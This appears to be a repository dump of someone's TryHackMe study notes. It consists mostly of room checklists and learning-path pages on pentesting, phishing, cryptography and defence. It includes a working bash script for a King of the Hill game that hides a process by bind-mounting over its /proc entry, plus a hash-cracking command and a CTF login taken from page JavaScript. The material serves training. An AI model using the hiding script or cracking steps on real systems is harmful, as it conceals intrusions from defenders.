├── Badges
├── test
├── README.md
└── burpsuite.svg
├── Certificates
├── README.md
└── THM-8MPVWS4EBC.png
├── .DS_Store
├── .gitignore
├── Room
├── .DS_Store
├── YARA
│ ├── myfirstrule.yar
│ └── YaraPro
├── DVWA
│ └── README.md
├── Bolt
│ └── README.md
├── Sublist3r
│ └── README.md
├── LFI Basics
│ └── README.md
├── Volatility
│ └── README.md
├── Dumping Router Firmware
│ └── README.md
├── Badbyte
│ └── README.md
├── Printer Hacking 101
│ └── README.md
├── AttackerKB
│ └── README.md
├── HackerNote
│ └── README.md
├── Injection
│ └── README.md
├── Toolbox: Vim
│ └── README.md
├── Intro to IoT Pentesting
│ └── README.md
├── Shodan.io
│ └── README.md
├── Geolocating Images
│ └── README.md
├── MAL: Researching
│ └── README.md
├── Phishing: HiddenEye
│ └── README.md
├── Physical Security Intro
│ └── README.md
├── Jupyter 101
│ └── README.md
├── Post-Exploitation Basics
│ └── README.md
├── Linux Strength Training
│ └── README.md
├── Solar, exploiting log4j
│ └── README.md
├── ffuf
│ └── README.md
├── Android Hacking 101
│ └── README.md
├── Annie
│ └── README.md
├── Brute
│ └── README.md
├── Web Enumeration
│ └── README.md
├── Intrusion Detection
│ └── README.md
├── Wifi Hacking 101
│ └── README.md
├── Epoch
│ └── README.md
├── CC: Pen Testing
│ └── README.md
├── Introduction to OWASP ZAP
│ └── README.md
├── Empire
│ └── README.md
├── MAL: Malware Introductory
│ └── README.md
└── TheHive Project
│ └── README.md
├── Modules
├── .DS_Store
├── Privilege Escalation
│ └── README.md
├── Phishing
│ └── README.md
├── Cyber Security Awareness
│ └── README.md
├── Compromising Active Directory
│ └── README.md
├── Initial Access
│ └── README.md
├── Network Security Evasion
│ └── README.md
├── Red Team Fundamentals
│ └── README.md
└── Windows Fundamentals
│ └── Windows Internals.md
├── King of the Hill
├── .DS_Store
├── KoTH
│ ├── KoTH.png
│ ├── KoTh-Hidding
│ └── KoTH-Protection
├── Cheatsheet
│ └── KoTH Protect King.md
└── README.md
├── Learning Path
├── Cyber Defense
│ ├── Intro to ISAC
│ │ └── APT--Advanced Persistent Threats
│ │ │ └── README.md
│ └── MITRE
│ │ └── README.md
├── Complete Beginner
│ ├── Windows Exploitation Basics
│ │ ├── Metasploit: Introduction
│ │ │ └── README.md
│ │ ├── Metasploit: Exploitation
│ │ │ └── README.md
│ │ ├── Metasploit: Meterpreter
│ │ │ └── README.md
│ │ ├── Blue
│ │ │ └── README.md
│ │ ├── README.md
│ │ ├── Windows Fundamentals 1
│ │ │ └── README.md
│ │ ├── Windows Fundamentals 2
│ │ │ └── README.md
│ │ └── Active Directory Basics
│ │ │ └── README.md
│ ├── Cryptography
│ │ ├── Hashing - Crypto 101
│ │ │ └── README.md
│ │ ├── John The Ripper
│ │ │ └── README.md
│ │ ├── README.md
│ │ └── Encryption - Crypto 101
│ │ │ └── README.md
│ ├── Complete Beginner Introduction
│ │ └── README.md
│ ├── Basic Computer Exploitation
│ │ ├── Steel Mountain
│ │ │ └── README.md
│ │ └── README.md
│ ├── Linux Fundamentals
│ │ └── README.md
│ ├── Basic Computer Exploitation.md
│ ├── Network Exploitation Basics
│ │ └── README.md
│ ├── README.md
│ └── Shells and Privilege Escalation
│ │ └── README.md
├── Pre Security
│ └── README.md
├── Jr Penetration Tester
│ └── README.md
├── Red Teaming
│ ├── Post Compromise
│ │ └── README.md
│ ├── Learn & win prizes - Fall 2022
│ │ └── README.md
│ └── README.md
├── SOC Level 1
│ ├── Endpoint Security Monitoring
│ │ └── README.md
│ ├── Network Security and Traffic Analysis
│ │ ├── Brim
│ │ │ └── cheat.md
│ │ ├── README.md
│ │ ├── Snort Challenge - The Basics
│ │ │ ├── README.md
│ │ │ └── local.rules
│ │ └── Zeek Exercises
│ │ │ └── README.md
│ ├── Cyber Defence Frameworks
│ │ └── README.md
│ └── README.md
├── CompTIA Pentest+
│ ├── Application-based vulnerabilities
│ │ └── README.md
│ ├── Network-based vulnerabilities
│ │ └── README.md
│ ├── Local-host vulnerabilities
│ │ ├── README.md
│ │ └── Attacktive Directory
│ │ │ └── README.md
│ ├── Penetration Testing Tools
│ │ └── README.md
│ └── README.md
├── Web Fundamentals
│ ├── README.md
│ ├── How The Web Works
│ │ └── README.md
│ ├── Burp Suite
│ │ └── README.md
│ └── Introduction to Web Hacking
│ │ └── README.md
├── Introduction to Cyber Security
│ └── README.md
├── README.md
└── Offensive Pentesting
│ └── README.md
├── TryHackMe Menu ToDo.md
├── Labs
└── Active Directory
│ └── README.md
├── Writeup
├── Agent Sudo
│ └── README.md
└── CyberHeroes.md
├── Teaching
└── README.md
└── Firewall-VPN
/Badges/test:
--------------------------------------------------------------------------------
1 | 1
2 |
--------------------------------------------------------------------------------
/Certificates/README.md:
--------------------------------------------------------------------------------
1 |
2 | 
3 |
--------------------------------------------------------------------------------
/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AnLoMinus/TryHackMe/HEAD/.DS_Store
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 |
2 | King of the Hill/KoTH/ChangeMe_SetTarget-KoTH-Log.md
3 |
--------------------------------------------------------------------------------
/Room/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AnLoMinus/TryHackMe/HEAD/Room/.DS_Store
--------------------------------------------------------------------------------
/Room/YARA/myfirstrule.yar:
--------------------------------------------------------------------------------
1 | rule WeFoundThat {
2 | condition: true
3 | }
4 |
--------------------------------------------------------------------------------
/Modules/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AnLoMinus/TryHackMe/HEAD/Modules/.DS_Store
--------------------------------------------------------------------------------
/King of the Hill/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AnLoMinus/TryHackMe/HEAD/King of the Hill/.DS_Store
--------------------------------------------------------------------------------
/Certificates/THM-8MPVWS4EBC.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AnLoMinus/TryHackMe/HEAD/Certificates/THM-8MPVWS4EBC.png
--------------------------------------------------------------------------------
/King of the Hill/KoTH/KoTH.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AnLoMinus/TryHackMe/HEAD/King of the Hill/KoTH/KoTH.png
--------------------------------------------------------------------------------
/Room/DVWA/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | - [x] [DVWA](https://tryhackme.com/room/dvwa)
4 | > Basic room for testing exploits against the Damn Vulnerable Web Application box
5 | - [x] Task 1 DVWA
6 |
--------------------------------------------------------------------------------
/Room/Bolt/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | - [ ] [Bolt](https://tryhackme.com/room/bolt)
4 | > A hero is unleashed
5 | - [ ] Task 1 Deploy the machine
6 | - [ ] Task 2 Hack your way into the machine!
7 |
--------------------------------------------------------------------------------
/Room/Sublist3r/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | - [x] [Sublist3r](https://tryhackme.com/room/rpsublist3r)
4 | > Learn how to find subdomains with Sublist3r!
5 | - [x] Task 1 Intro
6 | - [x] Task 2 Installation
7 | - [x] Task 3 Switchboard
8 | - [x] Task 4 Scans away!
9 |
--------------------------------------------------------------------------------
/Room/LFI Basics/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | - [x] [LFI Basics](https://tryhackme.com/room/lfibasics)
4 | > Learn the basics of local file inclusion
5 | - [x] Task 1 Local File Inclusion
6 | - [x] Task 2 Local File Inclusion using Directory Traversal
7 | - [x] Task 3 Reaching RCE using LFI and log poisoning
8 |
--------------------------------------------------------------------------------
/Room/Volatility/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | - [ ] [Volatility](https://tryhackme.com/room/bpvolatility)
4 | > Learn how to perform memory forensics with Volatility!
5 | - [ ] Task 1 Intro
6 | - [ ] Task 2 Obtaining Memory Samples
7 | - [ ] Task 3 Examining Our Patient
8 | - [ ] Task 4 Post Actions
9 | - [ ] Task 5 Extra Credit
10 |
--------------------------------------------------------------------------------
/Room/Dumping Router Firmware/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | - [ ] [Dumping Router Firmware](https://tryhackme.com/room/rfirmware)
4 | > Have you ever been curious about how your router works? What OS it runs? What makes it tick?
5 | - [ ] Task 1 Preparation
6 | - [ ] Task 2 Investigating Firmware
7 | - [ ] Task 3 Mounting and Analysis of the Router's Filesystem
8 |
--------------------------------------------------------------------------------
/Learning Path/Cyber Defense/Intro to ISAC/APT--Advanced Persistent Threats/README.md:
--------------------------------------------------------------------------------
1 | # Advanced Persistent Threats (APTs)
2 | - [THREAT ACTORS](./Groups.md)
3 | - mandiant: [APT Groups](https://www.mandiant.com/resources/apt-groups)
4 |
5 | - [APT & CyberCriminal Campaign Collection](https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections)
6 | - [APT Groups and Operations](https://docs.google.com/spreadsheets/u/1/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/pubhtml)
7 |
8 |
--------------------------------------------------------------------------------
/Room/Badbyte/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | - [ ] [Badbyte](https://tryhackme.com/room/badbyte)
4 | > Infiltrate BadByte and help us to take over root.
5 | - [ ] Task 1 Deploy the machine
6 | - [ ] Task 2 Reconnaissance
7 | - [ ] Task 3 Foothold
8 | - [ ] Task 4 Port Forwarding
9 | - [ ] Task 5 Web Exploitation
10 | - [ ] Task 6 Privilege Escalation
11 |
--------------------------------------------------------------------------------
/TryHackMe Menu ToDo.md:
--------------------------------------------------------------------------------
1 | - [x] TryHackMe Menu ToDo
2 | - [x] Start
3 | - [ ] Asking For Username:
4 | - [ ] Asking For TryHackMe VPN File:
5 | - [ ] Asking Data for Reporting:
6 | - [ ] Asking Location For Reporting:
7 | - [ ] Asking For IP Target:
8 |
9 | ---
10 |
11 | - [x] Stop
12 | - [ ] anonsurf status
13 | - [ ] anonsurf start
14 | - [ ] anonsurf stop
15 |
16 | ---
17 |
18 | - [x] Status
19 | - [ ] Asking For Username:
20 |
21 |
22 |
23 |
--------------------------------------------------------------------------------
/Room/Printer Hacking 101/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | - [ ] [Printer Hacking 101](https://tryhackme.com/room/printerhacking101)
4 | > Learn about (and get hands on with) printer hacking and understand the basics of IPP.
5 | - [ ] Task 1 Unit 1 - Introduction
6 | - [ ] Task 2 Unit 2: IPP Port
7 | - [ ] Task 3 Unit 3: Targeting & Exploitation
8 | - [ ] Task 4 Unit 4 - Conclusion
9 |
--------------------------------------------------------------------------------
/Room/AttackerKB/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | - [ ] [AttackerKB](https://tryhackme.com/room/attackerkb)
4 | > Learn how to leverage AttackerKB and learn about exploits in your workflow!
5 | - [ ] Task 1 I'm attacking what now?
6 | - [ ] Task 2 Discovering the Lay of the Land
7 | - [ ] Task 3 Learning to Fly
8 | - [ ] Task 4 Blasting Away
9 | - [ ] Task 5 Going Further
10 |
--------------------------------------------------------------------------------
/Labs/Active Directory/README.md:
--------------------------------------------------------------------------------
1 | # Training Labs
2 |
3 | ----
4 |
5 | ### Active Directory
6 | - [Breaching Active Directory](https://tryhackme.com/room/breachingad)
7 | - [Enumerating Active Directory](https://tryhackme.com/room/adenumeration)
8 | - [Lateral Movement and Pivoting](https://tryhackme.com/room/lateralmovementandpivoting)
9 | - [Exploiting Active Directory](https://tryhackme.com/room/exploitingad)
10 | - [Active Directory Persistence](https://tryhackme.com/room/persistingad)
11 |
12 | ---
13 |
14 |
--------------------------------------------------------------------------------
/Room/HackerNote/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | - [ ] [HackerNote](https://tryhackme.com/room/hackernote)
4 | > A custom webapp, introducing username enumeration, custom wordlists and a basic privilege escalation exploit.
5 | - [ ] Task 1 Reconnaissance
6 | - [ ] Task 2 Investigate
7 | - [ ] Task 3 Exploit
8 | - [ ] Task 4 Attack Passwords
9 | - [ ] Task 5 Escalate
10 | - [ ] Task 6 Comments on realism and Further Reading
11 |
--------------------------------------------------------------------------------
/Room/Injection/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | - [ ] [Injection](https://tryhackme.com/room/injection)
4 | > Walkthrough of OS Command Injection. Demonstrate OS Command Injection and explain how to prevent it on your servers
5 | - [ ] Task 1 Introduction & Deploy
6 | - [ ] Task 2 An Introduction To Command Injection
7 | - [ ] Task 3 Blind Command Injection
8 | - [ ] Task 4 Active Command Injection
9 | - [ ] Task 5 Get The Flag!
10 |
--------------------------------------------------------------------------------
/Room/Toolbox: Vim/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | - [ ] [Toolbox: Vim](https://tryhackme.com/room/toolboxvim)
4 | > Learn vim, a universal text editor that can be incredibly powerful when used properly. From basic text editing to editing of binary files, Vim can be an important arsenal in a security toolkit.
5 | - [ ] Task 1 Task 1
6 | - [ ] Task 2 Task 2
7 | - [ ] Task 3 Task 3
8 | - [ ] Task 4 Task 4
9 | - [ ] Task 5 Task 5
10 |
--------------------------------------------------------------------------------
/Room/Intro to IoT Pentesting/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | - [x] [Intro to IoT Pentesting](https://tryhackme.com/room/iotintro)
4 | > A beginner friendly walkthrough for internet of things (IoT) pentesting.
5 | - [x] Task 1 Foreword
6 | - [x] Task 2 A little theory
7 | - [x] Task 3 Connecting to the machine
8 | - [x] Task 4 Unpacking the firmware
9 | - [x] Task 5 Attacking the application
10 | - [x] Task 6 Personal thoughts
11 |
--------------------------------------------------------------------------------
/Learning Path/Complete Beginner/Windows Exploitation Basics/Metasploit: Introduction/README.md:
--------------------------------------------------------------------------------
1 | 
2 | - [x] [Metasploit: Introduction](https://tryhackme.com/room/metasploitintro)
3 | - An introduction to the main components of the Metasploit Framework.
4 | - [x] Task 1 Introduction to Metasploit
5 | - [x] Task 2 Main Components of Metasploit
6 | - [x] Task 3 Msfconsole
7 | - [x] Task 4 Working with modules
8 | - [x] Task 5 Summary
9 |
10 |
--------------------------------------------------------------------------------
/Learning Path/Complete Beginner/Cryptography/Hashing - Crypto 101/README.md:
--------------------------------------------------------------------------------
1 | 
2 | - [x] [Hashing - Crypto 101](https://tryhackme.com/room/hashingcrypto101)
3 | > An introduction to Hashing, as part of a series on crypto
4 | - [x] Task 1 Key Terms
5 | - [x] Task 2 What is a hash function?
6 | - [x] Task 3 Uses for hashing
7 | - [x] Task 4 Recognising password hashes
8 | - [x] Task 5 Password Cracking
9 | - [x] Task 6 Hashing for integrity checking
10 |
--------------------------------------------------------------------------------
/Room/Shodan.io/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | - [ ] [Shodan.io](https://tryhackme.com/room/shodan)
4 | > Learn about Shodan.io and how to use it for devices enumeration - is your coffee machine publicly accessible?
5 | - [ ] Task 1 Introduction
6 | - [ ] Task 2 Filters
7 | - [ ] Task 3 Google & Filtering
8 | - [ ] Task 4 Shodan Monitor
9 | - [ ] Task 5 Shodan Dorking
10 | - [ ] Task 6 Shodan Extension
11 | - [ ] Task 7 Exploring the API & Conclusion
12 |
--------------------------------------------------------------------------------
/Learning Path/Complete Beginner/Windows Exploitation Basics/Metasploit: Exploitation/README.md:
--------------------------------------------------------------------------------
1 | 
2 | - [x] [Metasploit: Exploitation](https://tryhackme.com/room/metasploitexploitation)
3 | - Using Metasploit for scanning, vulnerability assessment and exploitation.
4 | - [x] Task 1 Introduction
5 | - [x] Task 2 Scanning
6 | - [x] Task 3 The Metasploit Database
7 | - [x] Task 4 Vulnerability Scanning
8 | - [x] Task 5 Exploitation
9 | - [x] Task 6 Msfvenom
10 | - [x] Task 7 Summary
11 |
12 |
--------------------------------------------------------------------------------
/Learning Path/Complete Beginner/Windows Exploitation Basics/Metasploit: Meterpreter/README.md:
--------------------------------------------------------------------------------
1 | 
2 | - [x] [Metasploit: Meterpreter](https://tryhackme.com/room/meterpreter)
3 | - Take a deep dive into Meterpreter, and see how in-memory payloads can be used for post-exploitation.
4 | - [x] Task 1 Introduction to Meterpreter
5 | - [x] Task 2 Meterpreter Flavors
6 | - [x] Task 3 Meterpreter Commands
7 | - [x] Task 4 Post-Exploitation with Meterpreter
8 | - [x] Task 5 Post-Exploitation Challenge
9 |
10 |
--------------------------------------------------------------------------------
/Room/Geolocating Images/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | - [ ] [Geolocating Images](https://tryhackme.com/room/geolocatingimages)
4 | > Room to understand how to geolocate images
5 | - [ ] Task 1 Getting Started
6 | - [ ] Task 2 Getting our feet wet - where is this?
7 | - [ ] Task 3 Geolocating Images 101
8 | - [ ] Task 4 Now your turn
9 | - [ ] Task 5 Helpful tips for geolocating
10 | - [ ] Task 6 Your turn, again!
11 | - [ ] Task 7 Your turn, what can you see?
12 | - [ ] Task 8 You're done!
13 |
--------------------------------------------------------------------------------
/Room/MAL: Researching/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | - [ ] [MAL: Researching](https://tryhackme.com/room/malresearching)
4 | > Understanding checksums, how to generate them and their use throughout malware analysis with online sandboxing & reporting services
5 | - [ ] Task 1 Intro
6 | - [ ] Task 2 Deploy!
7 | - [ ] Task 3 Checksums 101
8 | - [ ] Task 4 Online Sandboxing
9 | - [ ] Task 5 Practical: Calculating & Reporting Checksums
10 | - [ ] Task 6 VirusTotal
11 | - [ ] Task 7 Future Reading (References)
12 |
--------------------------------------------------------------------------------
/Room/Phishing: HiddenEye/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | - [ ] [Phishing: HiddenEye](https://tryhackme.com/room/phishinghiddeneye)
4 | > A simple guide on how to use a tool known as HiddenEye developed by ANONUD4Y. This tool helps you create a phishing page for different sites such as Gmail, Snapchat, Paypal and more. Including understanding the difference between legit and fake site.
5 | - [ ] Task 1 Installation & Creating your first phishing page !
6 | - [ ] Task 2 Masking Your Link.
7 | - [ ] Task 3 Creating Gmail Phishing Page !
8 |
--------------------------------------------------------------------------------
/Room/Physical Security Intro/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | - [ ] [Physical Security Intro](https://tryhackme.com/room/physicalsecurityintro)
4 | > This room is an introduction to physical security methods to bypass locks, doors and other physical barriers.
5 | - [ ] Task 1 Introduction
6 | - [ ] Task 2 Overt, Covert, and Surreptitious Entry
7 | - [ ] Task 3 Lock Picking
8 | - [ ] Task 4 Lock Anatomy
9 | - [ ] Task 5 Padlock Bypassing
10 | - [ ] Task 6 Hardware Bypassing
11 | - [ ] Task 7 Credits and More Resources
12 |
--------------------------------------------------------------------------------
/Learning Path/Complete Beginner/Windows Exploitation Basics/Blue/README.md:
--------------------------------------------------------------------------------
1 | 
2 | - [x] [Blue](https://tryhackme.com/room/blue)
3 | - Deploy & hack into a Windows machine, leveraging common misconfigurations issues.
4 | - [x] Task 1 Recon
5 | - [x] Task 2 Gain Access
6 | - [x] Task 3 Escalate
7 | - [x] Task 4 Cracking
8 | - Command To Crack Hash Dumped From Windows meterpreter:
9 | > `john jon.hash --format=NT --wordlist=/usr/share/wordlists/rockyou.txt --show`
10 | - [x] Task 5 Find flags!
11 |
12 | ---
13 |
14 |
--------------------------------------------------------------------------------
/Room/Jupyter 101/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | - [ ] [Jupyter 101](https://tryhackme.com/room/jupyter101)
4 | > A friendly introduction into using the Jupyter Notebook environment. Learn to process and visualise data!
5 | - [ ] Task 1 Preface
6 | - [ ] Task 2 What is Jupyter?
7 | - [ ] Task 3 Deploying Instance & Logging In
8 | - [ ] Task 4 Let's Learn More About Jupyter
9 | - [ ] Task 5 Understanding how Jupyter Notebooks Run
10 | - [ ] Task 6 Interacting With the Filesystem!
11 | - [ ] Task 7 Handling Data With Pandas
12 | - [ ] Task 8 Visualising Data With Matplotlib
13 |
--------------------------------------------------------------------------------
/Room/Post-Exploitation Basics/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | - [ ] [Post-Exploitation Basics](https://tryhackme.com/room/postexploit)
4 | > Learn the basics of post-exploitation and maintaining access with mimikatz, bloodhound, powerview and msfvenom
5 | - [ ] Task 1 Introduction
6 | - [ ] Task 2 Enumeration w/ Powerview
7 | - [ ] Task 3 Enumeration w/ Bloodhound
8 | - [ ] Task 4 Dumping hashes w/ mimikatz
9 | - [ ] Task 5 Golden Ticket Attacks w/ mimikatz
10 | - [ ] Task 6 Enumeration w/ Server Manager
11 | - [ ] Task 7 Maintaining Access
12 | - [ ] Task 8 Conclusion
13 |
--------------------------------------------------------------------------------
/Room/Linux Strength Training/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | - [ ] [Linux Strength Training](https://tryhackme.com/room/linuxstrengthtraining)
4 | > Guided room for beginners to learn/reinforce linux command line skills
5 | - [ ] Task 1 Intro
6 | - [ ] Task 2 Finding your way around linux - overview
7 | - [ ] Task 3 Working with files
8 | - [ ] Task 4 Hashing - introduction
9 | - [ ] Task 5 Decoding base64
10 | - [ ] Task 6 Encryption/Decryption using gpg
11 | - [ ] Task 7 Cracking encrypted gpg files
12 | - [ ] Task 8 Reading SQL databases
13 | - [ ] Task 9 Final Challenge
14 |
--------------------------------------------------------------------------------
/Room/Solar, exploiting log4j/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | - [ ] [Solar, exploiting log4j](https://tryhackme.com/room/solar)
4 | > Explore CVE-2021-44228, a vulnerability in log4j affecting almost all software under the sun.
5 | - [ ] Task 1 CVE-2021-44228 Introduction
6 | - [ ] Task 2 Reconnaissance
7 | - [ ] Task 3 Discovery
8 | - [ ] Task 4 Proof of Concept
9 | - [ ] Task 5 Exploitation
10 | - [ ] Task 6 Persistence
11 | - [ ] Task 7 Detection
12 | - [ ] Task 8 Bypasses
13 | - [ ] Task 9 Mitigation
14 | - [ ] Task 10 Patching
15 | - [ ] Task 11 Credits and Author's Notes
16 |
--------------------------------------------------------------------------------
/Room/ffuf/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | - [ ] [ffuf](https://tryhackme.com/room/ffuf)
4 | > Enumeration, fuzzing, and directory brute forcing using ffuf
5 | - [ ] Task 1 `Info` Introduction
6 | - [ ] Task 2 `Walkthrough` Basics
7 | - [ ] Task 3 `Walkthrough` Finding pages and directories
8 | - [ ] Task 4 `Walkthrough` Using filters
9 | - [ ] Task 5 `Walkthrough` Fuzzing parameters
10 | - [ ] Task 6 `Walkthrough` Finding vhosts and subdomains
11 | - [ ] Task 7 `Walkthrough` Proxifying ffuf traffic
12 | - [ ] Task 8 `Questions` Reviewing the options
13 | - [ ] Task 9 `Info` About the author
14 |
--------------------------------------------------------------------------------
/Learning Path/Pre Security/README.md:
--------------------------------------------------------------------------------
1 |
2 | 
3 |
4 |
5 | ### Before hacking something, you first need to understand the basics.
6 |
7 | * Cyber security basics
8 | * Networking basics and weaknesses
9 |
10 | * The web and common attacks
11 | * Learn to use the Linux operating system
12 |
13 | - 40 Hours
14 |
15 | - Easy
16 |
17 |
19 |
20 | ✅ [Pre Security](https://tryhackme.com/path-action/presecurity/join)
21 |
22 |
23 |
24 | - [Certificate]()
25 |
26 | 
27 |
28 |
14 |
15 | > ### Answer the questions below
16 |
17 | > - What is user.txt?
18 | > - Answer format: [`***{*****************}`]()
19 |
20 | > - What is root.txt?
21 | > - Answer format: [`***{***********.*.******}`]()
22 |
--------------------------------------------------------------------------------
/Room/Brute/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | 
4 |
5 | # [Brute](https://tryhackme.com/room/ettubrute)
6 | #### You as well, Brutus?
7 |
8 | ---
9 |
10 | - [ ] [Task 1 What is the root and user flag?]()
11 |
12 | ---
13 |
14 | ## [Task 1 What is the root and user flag?]()
15 |
16 | #### You won't be able to just brute your way into this one, or will you?
17 |
18 | ### Answer the questions below
19 | - What is the user flag?
20 | > Answer format: [`***{***************}`]()
21 | - What is the root flag?
22 | > Answer format: [`***{****************************}`]()
23 |
--------------------------------------------------------------------------------
/Learning Path/Complete Beginner/Cryptography/John The Ripper/README.md:
--------------------------------------------------------------------------------
1 | 
2 | - [x] [John The Ripper](https://tryhackme.com/room/johntheripper0)
3 | > Learn how to use John the Ripper - An extremely powerful and adaptable hash cracking tool
4 | - [x] Task 1 John who?
5 | - [x] Task 2 Setting up John the Ripper
6 | - [x] Task 3 Wordlists
7 | - [x] Task 4 Cracking Basic Hashes
8 | - [x] Task 5 Cracking Windows Authentication Hashes
9 | - [x] Task 6 Cracking /etc/shadow Hashes
10 | - [x] Task 7 Single Crack Mode
11 | - [x] Task 8 Custom Rules
12 | - [x] Task 9 Cracking Password Protected Zip Files
13 | - [x] Task 10 Cracking Password Protected RAR Archives
14 | - [x] Task 11 Cracking SSH Keys with John
15 | - [x] Task 12 Further Reading
16 |
--------------------------------------------------------------------------------
/Learning Path/Jr Penetration Tester/README.md:
--------------------------------------------------------------------------------
1 |
2 | 
3 |
4 |
5 | ### Learn the necessary skills to start a career as a penetration tester
6 |
7 | * Pentesting methodologies and tactics
8 | * Enumeration, exploitation and reporting
9 | * Realistic hands-on hacking exercises
10 | * Learn security tools used in the industry
11 |
12 | - 56 Hours
13 |
14 | - Intermediate
15 |
16 | ### Career
17 | - Use this path to work towards a career in cyber
18 | - Penetration Tester
19 |
20 |
22 |
23 | ✅ [Jr Penetration Tester](https://tryhackme.com/path-action/jrpenetrationtester/join)
24 |
25 |
26 |
27 | - [Certificate]()
28 |
29 | 
30 |
31 |
18 | - [6] You see Function `authenticate`, there is 2 variables (a=name, b=pass)
19 | - (a.value=="h3ck3rBoi" & b.value==RevereString("54321@terceSrepuS")
20 |
21 |
22 |
--------------------------------------------------------------------------------
/King of the Hill/KoTH/KoTh-Hidding:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 | # A simple script to hide a process
3 | # Created by @MatheuzSecurity
4 | # https://twitter.com/inferigang
5 | # src: https://github.com/MatheuZSecurity/hide-a-process/blob/main/hide.sh
6 |
7 | function mkFolder() {
8 | rm -rf /tmp/hidden
9 | mkdir /tmp/hidden
10 | if [[ $? -ne 0 ]]; then
11 | echo "[err] An error has ocurred" >&2
12 | exit 1
13 | fi
14 | }
15 |
16 | function hideProcess() {
17 | mount --bind /tmp/hidden /proc/$pid
18 | }
19 |
20 |
21 | if [[ $(id -u) -ne "0" ]]; then
22 | echo "[error] You must run this script as root" >&2
23 | exit 1
24 | fi
25 |
26 | arr=('|' '/' '-' '\')
27 |
28 | for c in $(seq 1 5); do
29 | for elt in ${arr[*]}; do
30 | echo -ne "\r\033[<1>AInitializing $elt" && sleep 0.1;
31 | done
32 | done
33 |
34 | echo -ne "\r"
35 | read -p "Process ID: " pid
36 |
37 | mesg="Your PID was successfully hidden!"
38 |
39 | mkFolder && hideProcess && \
40 |
41 | for i in $(seq 1 ${#mesg}); do
42 | echo -ne "${mesg:i-1:1}"
43 | sleep 0.07
44 | done
45 | echo -ne "\n"
46 |
--------------------------------------------------------------------------------
/Learning Path/Complete Beginner/Cryptography/README.md:
--------------------------------------------------------------------------------
1 | ## Cryptography
2 |
3 | 
4 |
5 | ### Cryptography is essential in security. Learn how its used to preserve integrity and confidentiality of sensitive information.
6 |
7 | ---
8 |
9 | 
10 | - [x] [Hashing - Crypto 101](https://tryhackme.com/room/hashingcrypto101)
11 | > An introduction to Hashing, as part of a series on crypto
12 |
13 | ---
14 |
15 | 
16 | - [x] [John The Ripper](https://tryhackme.com/room/johntheripper0)
17 | > Learn how to use John the Ripper - An extremely powerful and adaptable hash cracking tool
18 |
19 | ---
20 |
21 | 
22 | - [x] [Encryption - Crypto 101](https://tryhackme.com/room/encryptioncrypto101)
23 | > An introduction to encryption, as part of a series on crypto
24 |
--------------------------------------------------------------------------------
/Learning Path/Red Teaming/Post Compromise/README.md:
--------------------------------------------------------------------------------
1 | # [Post Compromise]()
2 | ### Learn about the steps taken by an attacker right after gaining an initial foothold on a network.
3 |
4 | - ### [The Lay of the land](https://tryhackme.com/jr/thelayoftheland)
5 | Learn about and get hands-on with common technologies and security products used in corporate environments; both host and network-based security solutions are covered.
6 |
7 | - ### [Enumeration](https://tryhackme.com/jr/enumerationpe)
8 | This room is an introduction to enumeration when approaching an unknown corporate environment.
9 |
10 | - ### [Windows Privilege Escalation](https://tryhackme.com/jr/windowsprivesc20)
11 | Learn the fundamentals of Windows privilege escalation techniques.
12 |
13 | - ### [Windows Local Persistence](https://tryhackme.com/jr/windowslocalpersistence)
14 | Learn the most common persistence techniques used on Windows machines.
15 |
16 | - ### [Lateral Movement and Pivoting](https://tryhackme.com/jr/lateralmovementandpivoting)
17 | Learn about common techniques used to move laterally across a Windows network.
18 |
19 | - ### [Data Exfiltration](https://tryhackme.com/jr/dataxexfilt)
20 | An introduction to Data Exfiltration and Tunneling techniques over various protocols.
21 |
--------------------------------------------------------------------------------
/Room/Wifi Hacking 101/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | - [x] [Wifi Hacking 101](https://tryhackme.com/room/wifihacking101)
4 | > Learn to attack WPA(2) networks! Ideally you'll want a smartphone with you for this, preferably one that supports hosting wifi hotspots so you can follow along.
5 | - [x] Task 1 The basics - An Intro to WPA
6 | - [x] Task 2 You're being watched - Capturing packets to attack
7 | - [x] Task 3 Aircrack-ng - Let's Get Cracking
8 |
9 | ---
10 |
11 | # Home Work
12 |
13 | ### Key Terms
14 | - **`SSID`**: The network "name" that you see when you try and connect
15 | - **`ESSID`**: An SSID that *may* apply to multiple access points, eg a company office, normally forming a bigger network.
16 | - For Aircrack they normally refer to the network you're attacking.
17 | - **`BSSID`**: An access point MAC (hardware) address
18 | - **`WPA2-PSK`**: Wifi networks that you connect to by providing a password that's the same for everyone
